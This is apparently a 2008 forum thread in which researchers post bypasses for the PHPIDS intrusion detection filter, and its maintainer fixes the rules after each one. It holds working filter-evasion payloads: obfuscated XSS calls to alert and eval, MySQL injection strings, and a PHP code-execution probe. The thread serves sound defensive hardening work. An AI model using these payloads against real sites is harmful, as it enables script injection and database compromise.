I wanted to see how phpids handled some recent stuff from milw0rm, so for fun:
RCE
http://milw0rm.com/exploits/4851 Caught,score: 19
http://milw0rm.com/exploits/4849 Not caught.
vector:

?test=@phpinfo();@

LFI
http://milw0rm.com/exploits/4876 Caught,score: 15

SQLi
http://milw0rm.com/exploits/4867 Caught,score: 32
http://milw0rm.com/exploits/4863 Caught,score: 14

4 out of 5, not bad:)

-tx @ lowtech-labs.org

Hi!

Wow - very nice find - the problem with the not-detected vector actually turned out to be a severe bug in the converter. Thanks!

Greetings,
.mario

actually not that new but since I posted some (My)SQLi vectors with a column name required you can of course do some math with a column name only:

aa'or column=column -- #aa (php-ids)
aa'or column*column!='0 (php-ids)
aa'or column like column -- #a (php-ids)

0'*column is \N - '1 (php-ids)
1'*column is \N or '1 (php-ids)
1'*@a is \N - ' (php-ids)
1'*@a is \N or '1 (php-ids)

I haven't XSS'd PHPIDS for a while so I thought I'd have a go.....

x=[/&/,alert,/&/][1],x(1)

:)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Nice one Gareth! Here's a modified version that works in IE7 and Opera, but didn't work in Firefox 3 beta or Safari...
[demo.phpids.org]

Another modification of Gareth's, now with arbitrary code execution goodness: [p42.us]

Hehe cool thornmaker

Here's another:-

new RegExp(/a/,alert(1))
RegExp(/a/,alert(1))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/12/2008 12:41PM by Gareth Heyes.

javascript:"<iframe src='http://demo.php-ids.org/?test=RegExp(/a/,alert(name))' name='Follow the rabbit!'>"

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Indeed - it's been a while ;)

Thx Reiners, David and Gareth! The RegExp issue pointed on a converter bug and I customized the rules for the other ones. I think we can release 0.4.5 the next days - any thoughts?

Greetings,
.mario

a couple variations using null to bypass some filters:

http://p42.us/phpids/38.html

y='nam'
$x=eval,null
$x($x(y+'e')+/x/)

http://p42.us/phpids/39.html

y=name,null
$x=eval,null
$x(y)

just a little bug in the rules when using "is \N" without space.

0'*column is\N - '1 (php-ids)
1'*column is\N or '1 (php-ids)
1'*@a is\N - ' (php-ids)
1'*@a is\N or '1 (php-ids)

another modification:
1'*@a is \N-' (php-ids)

found and fixed - thx!

and another: http://p42.us/phpids/40.html

y='na'
$x=3.e1[(x=/eva/)?x[-1]+'l':$]
$x($x(y+'me')+1.)

Long time no hailstorm like this - damn exponential numbers, they messed with all XSS rules using \d :) fixed!

Just noted that I actually dont need the "is \N" issue neccessarily, sry ;)
1'*@a or'1 (php-ids)
1'*column or'1 (php-ids)

and this vector works as well but you have to make sure that the column contains integers (which isnt hard to find since most tables has a column like "id" or something similar):
1'*id-'0 (php-ids)

@.mario: my last one still works... you sure it's fixed?

Ah damn - I accidentally didn't deploy the latest converter revision. Done!

I'm pretty sure this didn't work before (the 1. part... lots of variations also work like .1, -1, etc). Maybe moving the ternary operator into the argument changes which filters it's brushing up against: http://p42.us/phpids/41.html

y='na'
$x=(1.)[(x=/eva/)?x[-1]+'l':$]
$x($x(y+'me')+1.)

Edited 1 time(s). Last edit at 01/12/2008 07:05PM by thornmaker.

delete alert(1)
AND
typeof alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/13/2008 07:00AM by Gareth Heyes.

This is a variant on delete but I thought it looked cool so I've added it here :)

delete this[
decodeURI
(
'a%6Cert'
)
]
(1)

I wanted a way to directly call the alert without eval. This holds the reference to the current window and so using this['alert'] refers property alert in the window.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/13/2008 07:52AM by Gareth Heyes.

I'm throwing things at it now :D

throw alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

*Ouch*

I added some fixes and I am pretty sure that it will be pretty hard to find new stuff right now - especially when coming to ternaries and concatenations. (But I am sure there's still potential for a surprise *g*)

Greetings,
.mario

Hehe we'll see ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@.mario: ternary is my middle name - [p42.us]

@Master Ternary Li

Hehe I know :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1 instanceof alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Ah bloody hell - the instanceof I did expect but the in I didn't. Nice!

And btw even that one works:

1in alert(1)

@mario

It might be interesting to collect all the JS functions and objects and run a simple script to determine javascript execution. I've done something similar with variables:-

http://www.businessinfo.co.uk/labs/js_variables/js_variable_tester.php

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yep - I saw that. I can't stop thinking about a way to sandbox JS execution recently. Seems to be the only way (ma1's words...)